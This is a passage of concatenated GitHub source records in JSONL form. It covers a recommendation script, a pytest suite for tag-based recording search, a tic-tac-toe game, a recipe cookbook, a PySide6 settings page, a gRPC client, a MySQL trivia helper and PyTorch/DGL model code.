min_seen\n\n\t\tseen.append(max_min_seen[1])\n\t\t\n\t\tplt.scatter(X_svd[:,0], X_svd[:,1], c=categories, alpha=0.01)\n\t\tplt.scatter(X_svd[seen,0], X_svd[seen,1], s=100,c=[0.0]*len(seen), alpha=0.7)\n\t\tplt.show()\n\n\tprint(seen)\n\n\treturn\n\n\nif __name__ == \"__main__\":\n\tdata_dir = \"data/ml-100k/\"\n\n\tdf = pandas.read_csv(data_dir + \"u.item\", sep=\"|\", header=None, encoding='latin-1')\n\tvalues = df.values\n\n\t# Maintain genre data, movie_title\n\tX_titles = values[:,1]\n\tX_train = np.asfarray(values[:, 5:])\n\n\trow_sums = X_train.sum(axis=1)\n\tX_train = X_train / row_sums[:, np.newaxis]\n\n\tcategories = [np.argmax(X_train[i,:]) for i in range(X_train.shape[0])]\n\n\t#greedy_select(X_train, trials=10)\n\tantigreedy_select(X_train, trials=10)\n\n\n","repo_name":"dricciardelli/active_recommendation","sub_path":"movielens_content.py","file_name":"movielens_content.py","file_ext":"py","file_size_in_byte":2993,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"73285294633","text":"import pytest\nimport json\n\n\nclass TestRecordingsGetByTags:\n    def testFindRecordingTags(self, helper):\n        lucy = helper.given_new_user(self, \"lucy\")\n        group = lucy.create_group(helper.make_unique_group_name(self, \"lucys_group\"))\n        device = helper.given_new_device(self, \"Rec\", group, description=\"\")\n\n        untagged = device.has_recording()\n        human_cool_cat = makeTrackTaggedRecording(\n            device, helper, lucy, [[None, \"cat\"]], human_recordingTags=[\"cool\"]\n        )\n        human_missed_track = makeTaggedRecording(device, helper, [], lucy, [\"missed track\"])\n        human_multiple_animals = makeTaggedRecording(device, helper, [], lucy, [\"multiple animals\"])\n        human_trapped = makeTaggedRecording(device, helper, [], lucy, [\"trapped in trap\"])\n\n        ai_multiple = makeTaggedRecording(device, helper, [\"multiple animals\"], lucy, [])\n\n        ai_possum = makeTrackTaggedRecording(device, helper, lucy, [[\"possum\", None]])\n        human_possum = makeTrackTaggedRecording(device, helper, lucy, [[None, \"possum\"]])\n        ai_human_possum = makeTrackTaggedRecording(\n            device, helper, lucy, [[\"possum\", \"possum\"]], human_recordingTags=[\"cool\"]\n        )\n\n        ai_possum2 = makeTrackTaggedRecording(device, helper, lucy, [[\"possum\", None], [\"cat\", None]])\n        human_cat_possum2 = makeTrackTaggedRecording(\n            device, helper, lucy, [[\"cat\", None], [\"cat\", \"possum\"]], ai_RecordingTags=[\"multiple animals\"]\n        )\n        ai_human_possum2 = makeTrackTaggedRecording(device, helper, lucy, [[\"possum\", \"possum\"]])\n\n        # ai and human tags different - one track, on recording.\n        ai_human_possum3 = makeTrackTaggedRecording(device, helper, lucy, [[None, \"possum\"]])\n        ai_human_possum3.is_tagged_as(what=\"possum\").byAI(helper.admin_user())\n\n        all = set(\n            [\n                untagged,\n                ai_possum,\n                ai_possum2,\n                human_possum,\n                human_cat_possum2,\n                ai_human_possum,\n                ai_human_possum2,\n                ai_human_possum3,\n                human_cool_cat,\n                ai_multiple,\n                human_trapped,\n                human_multiple_animals,\n                human_missed_track,\n            ]\n        )\n\n        all_untagged = set([untagged, human_missed_track, human_multiple_animals, human_trapped, ai_multiple])\n 
lucy.when_searching_for_tagmode_and_tags(\"any\", []).can_see_all_recordings_from_(all)\n\n expected = all.copy()\n expected = expected - all_untagged\n expected.remove(human_cool_cat)\n\n lucy.when_searching_for_tagmode_and_tags(\"tagged\", [\"possum\"]).can_only_see_recordings(\n *expected\n ).from_(all)\n\n expected = [human_possum, human_cat_possum2, ai_human_possum, ai_human_possum2, ai_human_possum3]\n lucy.when_searching_for_tagmode_and_tags(\"human-tagged\", [\"possum\"]).can_only_see_recordings(\n *expected\n ).from_(all)\n\n expected = [ai_possum, ai_possum2, ai_human_possum, ai_human_possum2]\n lucy.when_searching_for_tagmode_and_tags(\"automatic-tagged\", [\"possum\"]).can_only_see_recordings(\n *expected\n ).from_(all)\n\n expected = [ai_human_possum, ai_human_possum2]\n lucy.when_searching_for_tagmode_and_tags(\"both-tagged\", [\"possum\"]).can_only_see_recordings(\n *expected\n ).from_(all)\n\n # Other animals\n expected_rat_cat = [ai_possum2, human_cat_possum2, human_cool_cat]\n lucy.when_searching_for().tagmode(\"tagged\").tags([\"rat\", \"cat\"]).can_only_see_recordings(\n *expected_rat_cat\n ).from_(all)\n\n expected = all.copy()\n expected = expected - all_untagged\n lucy.when_searching_for().tagmode(\"tagged\").tags([\"rat\", \"cat\", \"possum\"]).can_only_see_recordings(\n *expected\n ).from_(all)\n\n # no animal tags\n expected = [untagged]\n lucy.when_searching_for_tagmode(\"untagged\").can_only_see_recordings(*expected).from_(all)\n\n expected = [untagged, ai_possum, ai_possum2, ai_multiple]\n lucy.when_searching_for_tagmode(\"no-human\").can_only_see_recordings(*expected).from_(all)\n\n expected = [ai_possum, ai_possum2, ai_multiple]\n lucy.when_searching_for_tagmode(\"automatic-only\").can_only_see_recordings(*expected).from_(all)\n\n expected = [human_possum, human_cool_cat, human_trapped, human_multiple_animals, human_missed_track]\n lucy.when_searching_for_tagmode(\"human-only\").can_only_see_recordings(*expected).from_(all)\n\n expected = [ai_human_possum, ai_human_possum2, ai_human_possum3, human_cat_possum2]\n lucy.when_searching_for_tagmode(\"automatic+human\").can_only_see_recordings(*expected).from_(all)\n\n expected = [human_missed_track]\n lucy.when_searching_for_tagmode(\"missed track\").can_only_see_recordings(*expected).from_(all)\n\n expected = [human_multiple_animals, human_cat_possum2, ai_multiple]\n lucy.when_searching_for_tagmode(\"multiple animals\").can_only_see_recordings(*expected).from_(all)\n\n expected = [human_trapped]\n lucy.when_searching_for_tagmode(\"trapped in trap\").can_only_see_recordings(*expected).from_(all)\n\n expected = [ai_human_possum, human_cool_cat]\n lucy.when_searching_for_tagmode(\"cool\").can_only_see_recordings(*expected).from_(all)\n\n expected = [human_cool_cat]\n lucy.when_searching_for_tagmode(\"cool\").tags([\"cat\"]).can_only_see_recordings(*expected).from_(all)\n\n def testInterestingRecordingTrackTags(self, helper):\n julie = helper.given_new_user(self, \"julie\")\n group = julie.create_group(helper.make_unique_group_name(self, \"julies_group\"))\n device = helper.given_new_device(self, \"Rec\", group, description=\"\")\n\n animal = makeTrackTaggedRecording(device, helper, julie, [[\"possum\", None]])\n false_positive = makeTrackTaggedRecording(device, helper, julie, [[None, \"false positive\"]])\n bird = makeTrackTaggedRecording(device, helper, julie, [[\"bird\", \"bird\"]])\n\n all = [animal, false_positive, bird]\n\n julie.when_searching_for_tagmode_and_tags(\"tagged\", 
[\"interesting\"]).can_only_see_recordings(\n animal\n ).from_(all)\n julie.when_searching_for().tagmode(\"tagged\").tags([\"interesting\", \"bird\"]).can_only_see_recordings(\n animal, bird\n ).from_(all)\n julie.when_searching_for().tagmode(\"tagged\").tags(\n [\"interesting\", \"false positive\"]\n ).can_only_see_recordings(animal, false_positive).from_(all)\n\n\ndef makeTaggedRecording(device, helper, ai_tags, tagger, human_tags):\n recording = device.has_recording()\n recording.name = \"ai:\" + str(ai_tags) + \" human: \" + str(human_tags)\n if ai_tags:\n for tag in ai_tags:\n recording.is_tagged_as(what=tag).byAI(helper.admin_user())\n if human_tags:\n for tag in human_tags:\n recording.is_tagged_as(what=tag).by(tagger)\n return recording\n\n\ndef makeTrackTaggedRecording(\n device, helper, tagger, trackTags, ai_RecordingTags=None, human_recordingTags=None\n):\n recording = makeTaggedRecording(device, helper, ai_RecordingTags, tagger, human_recordingTags)\n for combo in trackTags:\n recording.name += \"tags: \" + str(combo)\n track = helper.admin_user().can_add_track_to_recording(recording)\n if combo[0]:\n helper.admin_user().tag_track_as_AI(track, combo[0])\n if combo[1]:\n tagger.tag_track(track, combo[1])\n return recording\n","repo_name":"TheCacophonyProject/cacophony-api","sub_path":"test/test_recordings_get_by_tags.py","file_name":"test_recordings_get_by_tags.py","file_ext":"py","file_size_in_byte":7587,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"72"} +{"seq_id":"35051923257","text":"from tkinter import *\nfrom tkinter import font\n\nclass TicTacToe:\n window = Tk()\n img_empty = PhotoImage(file = \"image/Title.gif\").zoom(3)\n img_O = PhotoImage(file = \"image/o.gif\").zoom(3)\n img_X = PhotoImage(file = \"image/x.gif\").zoom(3)\n\n def __init__(self):\n self.window.geometry(\"300x450+450+450\")\n \n self.turn = 'X'\n self.run = True\n\n self.fontTitle = font.Font(self.window, size=16, weight='bold', family = '윤고딕230')\n\n self.frameTitle = Frame(self.window, padx=10, pady=10, bg='#ffc4c4') # 제목 프레임\n self.frameTitle.pack(side=\"top\",fill=\"both\")\n\n self.MainText = Label(self.frameTitle, font = self.fontTitle, text=\"TIC - TAC - TOE GAME\",bg='#fff8dd') # 제목 적기\n self.MainText.pack(anchor=\"center\", fill=\"both\")\n\n self.frame = Frame(self.window, bg='#fff8dd')\n self.frame.pack(side=\"top\",fill=\"both\")\n\n self.frameResult = Frame(self.window, padx=10, pady=10, bg='#ffc4c4') # 하단 설명 프레임 \n self.frameResult.pack(side=\"bottom\",fill=\"both\")\n\n self.ResultText = Label(self.frameResult, font = self.fontTitle, text=self.turn + \"의 차례\",bg='#fff8dd') # 하단 설명 적기\n self.ResultText.pack(anchor=\"center\", fill=\"both\")\n\n self.buttonList = []\n for r in range(3):\n for c in range(3):\n if r == 0:\n self.buttonList.append(Button(self.frame,image=self.img_empty,text=0, command=lambda R=r, C=c:self.press(R,C),width=94,height=94,bg = '#ffd6d6' ))\n elif r == 1:\n self.buttonList.append(Button(self.frame,image=self.img_empty,text=0, command=lambda R=r, C=c:self.press(R,C),width=94,height=94,bg = '#feffd6' ))\n elif r == 2:\n self.buttonList.append(Button(self.frame,image=self.img_empty,text=0, command=lambda R=r, C=c:self.press(R,C),width=94,height=94,bg = '#d8ffd6' ))\n self.buttonList[r*3+c].grid(row=r,column=c)\n\n def press(self,r,c):\n if not self.run:\n return\n\n if self.buttonList[r*3+c]['text'] == 0:\n if self.turn == 'X':\n self.buttonList[r*3+c].configure(image=self.img_X, text=1)\n self.turn = 'O'\n elif 
self.turn == 'O':\n self.buttonList[r*3+c].configure(image=self.img_O, text=-1)\n self.turn = 'X'\n self.ResultText.configure(text=self.turn + \"의 차례\")\n\n self.Referee()\n \n\n def Referee(self):\n indexes = [[0, 1, 2], [3, 4, 5], [6, 7, 8], [0, 3, 6], [1, 4, 7], [2, 5, 8], [0, 4, 8], [2, 4, 6]]\n result = []\n for index in indexes:\n result.append(sum([self.buttonList[d]['text'] for d in index]))\n\n if 3 in result:\n self.turn = 'X'\n self.run = False\n if -3 in result:\n self.turn = 'O'\n self.run = False\n\n if not 0 in [b['text'] for b in self.buttonList]:\n self.run = False\n self.turn = ''\n\n if not self.run:\n if self.turn == 'O' or self.turn == 'X':\n self.ResultText.configure(text=self.turn + \" 승리! 게임이 끝났습니다.\")\n else:\n self.ResultText.configure(text=\"무승부! 게임이 끝났습니다.\")\n \n def loop(self):\n self.window.mainloop()\n \nttt = TicTacToe()\nttt.loop()","repo_name":"truebird2201/scriptlang","sub_path":"game/tic-tac-toe.py","file_name":"tic-tac-toe.py","file_ext":"py","file_size_in_byte":3503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24745214978","text":"import sys \n\ndef count_n_arg():\n arg_list = sys.argv\n n_arg = len(arg_list)\n return n_arg\n\n\ndef get_user_input():\n print('Please select an option:')\n user_input = input()\n return user_input\n\n\ndef print_menu():\n print('================================')\n print('Welcome to the Python Cookbook !')\n print('List of available options:')\n print('1: Add a recipe')\n print('2: Delete a recipe')\n print('3: Print a recipe')\n print('4: Print the cookbook')\n print('5: Quit')\n print('================================')\n\n\ndef add_recipe(recipes, data):\n print('================================')\n print('Please enter the name of the recipe to add:')\n name = input()\n recipes.append(name)\n # create a new_recipe dict\n new_recipe = {}\n print('================================')\n print('Please enter ingredients of the recipe:')\n ingredients = []\n while True:\n ingredient = input()\n if ingredient == '':\n break\n else:\n ingredients.append(ingredient)\n print('================================')\n print('Please enter the meal type of the recipe:')\n meal_type = input()\n while True:\n print('================================')\n print('Please enter the preparation time of the recipe:')\n prep_time = input()\n if input_is_int(prep_time) is True and int(prep_time) > 0:\n break\n else:\n print('Preparation time should be a non-negative integer')\n # add ingredients, meal and prep_time to new_recipe dict\n new_recipe['ingredients'] = ingredients\n new_recipe['meal'] = meal_type\n new_recipe['prep_time'] = prep_time\n # add new_recipe dict to data list, then zip recipes and data lists\n data.append(new_recipe)\n new_recipe = dict(zip(recipes, data))\n return new_recipe\n\n\ndef delete_recipe(recipe_name):\n hashable_cookbook = [(key, value) for key, value in cookbook.items()]\n i_to_del = -1\n for i_recipe in range(len(hashable_cookbook)):\n if hashable_cookbook[i_recipe][0] == recipe_name:\n i_to_del = i_recipe\n if i_to_del != -1:\n hashable_cookbook.pop(i_to_del)\n new_cookbook = dict(hashable_cookbook)\n return new_cookbook\n else:\n print('Error !\\nRecipe not found !')\n\n\ndef print_recipes_names(cookbook):\n for recipe in recipes:\n print(recipe)\n\n\ndef print_recipe_details(recipe_name):\n key_list = list(cookbook.keys())\n value_list = list(cookbook.values())\n found = False\n for i in range(0, len(key_list)):\n if key_list[i] == recipe_name:\n 
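# Standalone illustration of the Referee sum trick used above: X buttons carry
# text=1 and O buttons text=-1, so a row/column/diagonal sums to +3 or -3 only
# when a single player owns all three of its cells (illustrative snippet, no
# Tk widgets involved).
LINES = [[0, 1, 2], [3, 4, 5], [6, 7, 8],
         [0, 3, 6], [1, 4, 7], [2, 5, 8],
         [0, 4, 8], [2, 4, 6]]

def winner(cells):  # cells: nine ints in {-1, 0, +1}, row-major board
    for line in LINES:
        s = sum(cells[i] for i in line)
        if s == 3:
            return 'X'
        if s == -3:
            return 'O'
    return None

assert winner([1, 1, 1, -1, -1, 0, 0, 0, 0]) == 'X'
assert winner([0] * 9) is None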
+{"seq_id":"24745214978","text":"import sys \n\ndef count_n_arg():\n    arg_list = sys.argv\n    n_arg = len(arg_list)\n    return n_arg\n\n\ndef get_user_input():\n    print('Please select an option:')\n    user_input = input()\n    return user_input\n\n\ndef print_menu():\n    print('================================')\n    print('Welcome to the Python Cookbook !')\n    print('List of available options:')\n    print('1: Add a recipe')\n    print('2: Delete a recipe')\n    print('3: Print a recipe')\n    print('4: Print the cookbook')\n    print('5: Quit')\n    print('================================')\n\n\ndef add_recipe(recipes, data):\n    print('================================')\n    print('Please enter the name of the recipe to add:')\n    name = input()\n    recipes.append(name)\n    # create a new_recipe dict\n    new_recipe = {}\n    print('================================')\n    print('Please enter ingredients of the recipe:')\n    ingredients = []\n    while True:\n        ingredient = input()\n        if ingredient == '':\n            break\n        else:\n            ingredients.append(ingredient)\n    print('================================')\n    print('Please enter the meal type of the recipe:')\n    meal_type = input()\n    while True:\n        print('================================')\n        print('Please enter the preparation time of the recipe:')\n        prep_time = input()\n        if input_is_int(prep_time) is True and int(prep_time) > 0:\n            break\n        else:\n            print('Preparation time should be a positive integer')\n    # add ingredients, meal and prep_time to new_recipe dict\n    new_recipe['ingredients'] = ingredients\n    new_recipe['meal'] = meal_type\n    new_recipe['prep_time'] = prep_time\n    # add new_recipe dict to data list, then zip recipes and data lists\n    data.append(new_recipe)\n    new_recipe = dict(zip(recipes, data))\n    return new_recipe\n\n\ndef delete_recipe(recipe_name):\n    hashable_cookbook = [(key, value) for key, value in cookbook.items()]\n    i_to_del = -1\n    for i_recipe in range(len(hashable_cookbook)):\n        if hashable_cookbook[i_recipe][0] == recipe_name:\n            i_to_del = i_recipe\n    if i_to_del != -1:\n        hashable_cookbook.pop(i_to_del)\n        new_cookbook = dict(hashable_cookbook)\n        return new_cookbook\n    else:\n        print('Error !\\nRecipe not found !')\n\n\ndef print_recipes_names(cookbook):\n    for recipe in cookbook:\n        print(recipe)\n\n\ndef print_recipe_details(recipe_name):\n    key_list = list(cookbook.keys())\n    value_list = list(cookbook.values())\n    found = False\n    for i in range(0, len(key_list)):\n        if key_list[i] == recipe_name:\n            print('Ingredients list :', value_list[i]['ingredients'])\n            print('To be eaten for :', value_list[i]['meal'])\n            print('Preparation time :', value_list[i]['prep_time'])\n            found = True\n    if found is False:\n        print('Error !\\nRecipe not found !')\n\n\ndef input_is_int(s):\n    if s[0] in ('-', '+'):\n        return s[1:].isdigit()\n    else:\n        return s.isdigit()\n\n\nif __name__ == \"__main__\":\n    recipes = ['sandwich', 'cake', 'salad']\n    data = [{'ingredients': ['ham', 'bread', 'cheese', 'tomatoes'],\n             'meal': 'lunch',\n             'prep_time': 10},\n            {'ingredients': ['flour', 'sugar', 'eggs'],\n             'meal': 'dessert',\n             'prep_time': 60},\n            {'ingredients': ['avocado', 'arugula', 'tomatoes', 'spinach'],\n             'meal': 'lunch',\n             'prep_time': 15}]\n    cookbook = dict(zip(recipes, data))\n    if count_n_arg() > 1:\n        print('Error ! Wrong number of arguments')\n        print('Usage : python3 recipe.py')\n    elif count_n_arg() == 1:\n        option = 0\n        while (option != 5):\n            print_menu()\n            try:\n                option = int(get_user_input())\n            except ValueError:\n                print(\"Sorry, this option does not exist.\\n\")\n            if option not in range(1, 6):\n                print(\"Sorry, this option does not exist.\\n\")\n            else:\n                if (option == 1):\n                    cookbook = add_recipe(recipes, data)\n                elif (option == 2):\n                    print('================================')\n                    print('Please enter the name of the recipe to delete')\n                    recipe_name = input()\n                    cookbook = delete_recipe(recipe_name)\n                elif (option == 3):\n                    print('================================')\n                    print('Please enter the name of the recipe to see its details')\n                    recipe_name = input()\n                    print_recipe_details(recipe_name)\n                elif (option == 4):\n                    print('================================')\n                    print('COOKBOOK')\n                    for i in range(0, len(cookbook)):\n                        print('=== RECIPE #', i, ' ===')\n                        print('Name\\t\\t', ':', recipes[i])\n                        print_recipe_details(recipes[i])\n    print('Cookbook closed. 
Goodbye !')\n print('================================')\n","repo_name":"Mitsun0bu/42AI-PythonBootcamp","sub_path":"module00/ex06/recipe.py","file_name":"recipe.py","file_ext":"py","file_size_in_byte":5135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73285294633","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom PySide6.QtWidgets import QMessageBox\n\nfrom baramFlow.coredb import coredb\nfrom baramFlow.coredb.coredb_writer import CoreDBWriter\nfrom baramFlow.coredb.reference_values_db import ReferenceValuesDB\nfrom baramFlow.view.widgets.content_page import ContentPage\nfrom .reference_values_page_ui import Ui_ReferenceValuesPage\n\n\nclass ReferenceValuesPage(ContentPage):\n def __init__(self):\n super().__init__()\n self._ui = Ui_ReferenceValuesPage()\n self._ui.setupUi(self)\n\n self._load()\n\n def save(self):\n xpath = ReferenceValuesDB.REFERENCE_VALUES_XPATH\n\n writer = CoreDBWriter()\n writer.append(xpath + '/area', self._ui.area.text(), self.tr(\"Area\"))\n writer.append(xpath + '/density', self._ui.density.text(), self.tr(\"Density\"))\n writer.append(xpath + '/length', self._ui.length.text(), self.tr(\"Length\"))\n writer.append(xpath + '/velocity', self._ui.velocity.text(), self.tr(\"Velocity\"))\n writer.append(xpath + '/pressure', self._ui.pressure.text(), self.tr(\"Pressure\"))\n\n errorCount = writer.write()\n if errorCount > 0:\n QMessageBox.critical(self, self.tr(\"Input Error\"), writer.firstError().toMessage())\n return False\n\n return True\n\n def _load(self):\n db = coredb.CoreDB()\n\n xpath = ReferenceValuesDB.REFERENCE_VALUES_XPATH\n self._ui.area.setText(db.getValue(xpath + '/area'))\n self._ui.density.setText(db.getValue(xpath + '/density'))\n self._ui.length.setText(db.getValue(xpath + '/length'))\n self._ui.velocity.setText(db.getValue(xpath + '/velocity'))\n self._ui.pressure.setText(db.getValue(xpath + '/pressure'))\n","repo_name":"nextfoam/baram","sub_path":"baramFlow/view/setup/reference_values/reference_values_page.py","file_name":"reference_values_page.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"72"} +{"seq_id":"3181862940","text":"from __future__ import print_function\n\nimport grpc\n\nfrom calculator import calculator_pb2, calculator_pb2_grpc\n\ndef run(i,j):\n channel = grpc.insecure_channel('localhost:50051')\n stub = calculator_pb2_grpc.CalculatorStub(channel)\n response = stub.Add(calculator_pb2.RequestAdd(inputA=i,inputB=j))\n print(response.result)\n\nif __name__ == '__main__':\n for i in range(-2,3):\n for j in range(-2,3):\n run(i,j)\n","repo_name":"rikithamanjunath/cmpe273-lab2","sub_path":"calculator/calculator_client.py","file_name":"calculator_client.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73014497513","text":"# -*- coding: utf-8 -*-\r\n\r\nimport mysql.connector\r\nimport sys\r\n\r\nclass Bdd:\r\n\r\n\t@classmethod\r\n\tdef ouvrir_connexion(cls):\r\n\t\tcls.data = mysql.connector.connect(user ='root', \r\n\t\t\tpassword='root', host='localhost', \r\n\t\t\tdatabase='trivial', port='8081')\r\n\t\tcls.curs = cls.data.cursor()\r\n\r\n\t@classmethod\r\n\tdef fermer_connexion(cls):\r\n\t\tcls.curs.close()\r\n\t\tcls.data.close()\r\n\r\n\t@classmethod\r\n\tdef lister_themes(cls):\r\n\t\tcls.ouvrir_connexion()\r\n\t\tcls.curs.execute(\"SELECT * FROM 
theme\")\r\n\t\tresult = cls.curs.fetchall()\r\n\t\tcls.fermer_connexion()\r\n\t\treturn result # on obtient une liste de tuples [(id_theme1, nom_theme1), (id_theme2, nom_theme2), ...]\r\n\r\n\t@classmethod\r\n\tdef lister_questions_theme(cls, theme): # on renseigne le thème choisi par l'utilisateur\r\n\t\tcls.ouvrir_connexion()\r\n\t\tcls.curs.execute(f\"SELECT id_question, libelle_question, difficulte_question FROM questions WHERE theme_question = {theme}\")\r\n\t\tresult = cls.curs.fetchall()\r\n\t\tcls.fermer_connexion()\r\n\t\treturn result # on obtient une liste de tuples [(id1, libelle1, diffic1), (id2, libelle2, diffic2), ...] de questions potentielles\r\n\r\n\t@classmethod\r\n\tdef lister_questions_dures(cls, theme, difficulte):\r\n\t\tcls.ouvrir_connexion()\r\n\t\tcls.curs.execute(f\"SELECT id_question, libelle_question, difficulte_question FROM questions WHERE theme_question = {theme} AND difficulte_question = {difficulte}\")\r\n\t\tresult = cls.curs.fetchall()\r\n\t\tcls.fermer_connexion()\r\n\t\treturn result # on obtient une liste de tuples [(id1, libelle1, diffic1), (id2, libelle2, diffic2), ...] de questions potentielles\r\n\r\n\t@classmethod\r\n\tdef obtenir_lib_dif_question(cls, id): # on renseigne l'id (choisi au hasard parmis les id correspondant au thème)\r\n\t\tcls.ouvrir_connexion()\r\n\t\tcls.curs.execute(f\"SELECT libelle_question, difficulte_question FROM questions WHERE id_question = {id}\")\r\n\t\tresult = cls.curs.fetchall()\r\n\t\tcls.fermer_connexion()\r\n\t\treturn result # on obtient un tuple (libelle1, diffic1) qui servira à afficher la question et la difficulté\r\n\r\n\t@classmethod\r\n\tdef obtenir_reponse_id(cls, id): # on renseigne l'id de la question qui a été posée à l'utilisateur\r\n\t\tcls.ouvrir_connexion()\r\n\t\tcls.curs.execute(f\"SELECT libelle_reponse FROM reponses WHERE id_question = {id} AND valeur_reponse = 1\")\r\n\t\tresult = cls.curs.fetchall()\r\n\t\tcls.fermer_connexion()\r\n\t\treturn result # on obtient la bonne réponse\r\n\r\n\t# @classmethod\r\n\t# def lister_joueurs(cls):\r\n\t# \tcls.ouvrir_connexion()\r\n\t# cls.curs.execute(\"SELECT nom_joueur FROM joueurs\")\r\n\t# \tresult= cls.curs.fetchall()\r\n\t# \tcls.fermer_connexion()\r\n\t# \tlj = []\r\n\t# \tfor joueur in result :\r\n\t# \t lj.append(joueur[0])\r\n\t# \treturn lj\r\n\t\r\n\t\r\n# def main():\r\n# \tp = Bdd\r\n# \tl = p.lister_themes()\r\n# \tprint(l) #[(1, 'Big Data'), (2, 'IA'), (3, 'Ethique'), (4, 'Python'), (5, 'Mathématique')]\r\n# \tm = p.lister_questions_theme(3)\r\n# \tprint(m) # [(1, \"Comment appelle-t-on...?\", 1), (2, \"Quel était le nom ... ?\", 2), (3, 'Quelle ... ?', 3)]\r\n# \tn = p.obtenir_lib_dif_question(2)\r\n# \tprint(n) # [(2, \"Quel était le nom ... 
?\", 2)]\r\n# \to = p.obtenir_reponse_id(2)\r\n# \tprint(o) # [('Tay',)]\r\n\r\n# main()\r\n\r\n","repo_name":"AudePertron/data_pursuit","sub_path":"connect_bdd.py","file_name":"connect_bdd.py","file_ext":"py","file_size_in_byte":3109,"program_lang":"python","lang":"fr","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"6423493348","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom padding_same_conv import Conv2d\nfrom blurPooling import BlurPool2d\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\nclass STRN(nn.Module):\n def __init__(self, n_view_cells, n_wrd_cells, vsize=7, wdist_size=6, wcode_size=3, emb_size=32, csize=128):\n super(STRN, self).__init__()\n self.n_view_cells = n_view_cells\n self.n_wrd_cells = n_wrd_cells\n self.vsize = vsize\n self.wdist_size = wdist_size\n self.wcode_size = wcode_size\n self.emb_size = emb_size\n self.csize = csize\n\n # Basic Distribution of World Cells\n self.sample_wdist(dist=\"uniform\")\n\n # Distort the World Distribution\n self.w2c = nn.Sequential(\n nn.Linear(wdist_size+vsize, 256),\n nn.ReLU(inplace=True),\n nn.Linear(256, 256),\n nn.ReLU(inplace=True),\n nn.Linear(256, wcode_size)\n )\n \n # Camera Space Embedding / Frustum Activation / Occlusion\n self.fc1 = nn.Linear(wcode_size, 256)\n self.fc2 = nn.Linear(256, 256)\n self.fc_act = nn.Linear(256, 1)\n self.fc_emb = nn.Linear(256, emb_size)\n\n # View Space Embedding Network\n self.vse = nn.Sequential(\n nn.Linear(2, 128),\n nn.ReLU(inplace=True),\n nn.Linear(128, emb_size)\n )\n\n def sample_wdist(self, dist):\n if dist == \"gaussian\":\n self.wdist = torch.randn(self.n_wrd_cells, self.wdist_size).to(device)\n elif dist == \"uniform\":\n self.wdist = (torch.rand(self.n_wrd_cells, self.wdist_size)*2-1).to(device)\n else:\n self.wdist = torch.randn(self.n_wrd_cells, self.wdist_size).to(device)\n\n def transform(self, v, view_size=(16,16)):\n # Get Transform Location Code of World Cells\n wdist_tile = self.wdist.reshape(-1, self.n_wrd_cells, self.wdist_size).repeat(v.shape[0], 1, 1)\n v_tile = v.reshape(-1, 1, self.vsize).repeat(1, self.n_wrd_cells, 1)\n wdist_input = torch.cat((wdist_tile, v_tile), dim=2).reshape(self.n_wrd_cells*v.shape[0],-1)\n wcode = self.w2c(wdist_input)#.reshape(-1,self.n_wrd_cells,self.wcode_size)\n \n # Camera Space Embedding\n h = F.relu(self.fc1(wcode))\n h = F.relu(self.fc2(h))\n activation = torch.sigmoid(self.fc_act(h).view(-1, self.n_wrd_cells, 1))\n cs_embedding = self.fc_emb(h).view(-1, self.n_wrd_cells, self.emb_size)\n \n # View Space Embedding\n x = torch.linspace(-1, 1, view_size[0])\n y = torch.linspace(-1, 1, view_size[1])\n x_grid, y_grid = torch.meshgrid(x, y)\n vcode = torch.cat((torch.unsqueeze(x_grid, 0), torch.unsqueeze(y_grid, 0)), dim=0).reshape(2,-1).permute(1,0).to(device) #(16*16, 2)\n vs_embedding = self.vse(vcode) #(256, 128)\n vs_embedding = torch.unsqueeze(vs_embedding, 0).repeat(v.shape[0], 1, 1) #(-1, view_cell, emb_size)\n \n # Cross-Space Cell Relation\n relation = torch.bmm(cs_embedding, vs_embedding.permute(0,2,1)) #(-1, wrd_cell, view_cell)\n return relation, activation\n\n def forward(self, view_cell, v, view_size=(16,16)):\n relation, activation = self.transform(v, view_size=view_size)\n distribution = torch.softmax(relation, 2)\n route = distribution * activation # (-1, n_wrd_cells, n_view_cells)\n wrd_cell = torch.bmm(view_cell, route.permute(0,2,1))\n return wrd_cell # (-1, csize, n_wrd_cells)\n \n def query(self, wrd_cell, v, 
view_size=(16,16), steps=None, occlusion=True):\n relation, activation = self.transform(v, view_size=view_size)\n distribution = torch.softmax(relation, 1)\n route = distribution * activation # (-1, n_wrd_cells, n_view_cells)\n query_view_cell = torch.bmm(wrd_cell, route).reshape(-1, self.csize, view_size[0], view_size[1])\n return query_view_cell","repo_name":"jerrywiston/Spatial-Transformation-Routing-Generative-Query-Network","sub_path":"backup/strn_gaussian.py","file_name":"strn_gaussian.py","file_ext":"py","file_size_in_byte":3972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37573424345","text":"import torch\nimport dgl\nfrom gs.utils import load_graph\nimport time\nimport numpy as np\nimport gs\nfrom gs.utils import SeedGenerator\nimport sys \nsys.path.append(\"..\") \nfrom ogb.nodeproppred import DglNodePropPredDataset\nimport argparse\nfrom dgl.dataloading import DataLoader, NeighborSampler\nimport tqdm\nimport scipy.sparse as sp\n\n# os.environ['CUDA_LAUNCH_BLOCKING'] = '1'\n\ndef load_ogbn_products():\n data = DglNodePropPredDataset(name=\"ogbn-products\",root=\"/home/ubuntu/data\")\n splitted_idx = data.get_idx_split()\n g, labels = data[0]\n g=g.long()\n feat = g.ndata['feat']\n labels = labels[:, 0]\n n_classes = len(\n torch.unique(labels[torch.logical_not(torch.isnan(labels))]))\n g.ndata.clear()\n # print(\"before:\",g)\n g = dgl.remove_self_loop(g)\n g = dgl.add_self_loop(g)\n # print(\"after:\",g)\n # sp.save_npz(\"/home/ubuntu/data/products_adj.npz\", g.adj(scipy_fmt='coo'))\n 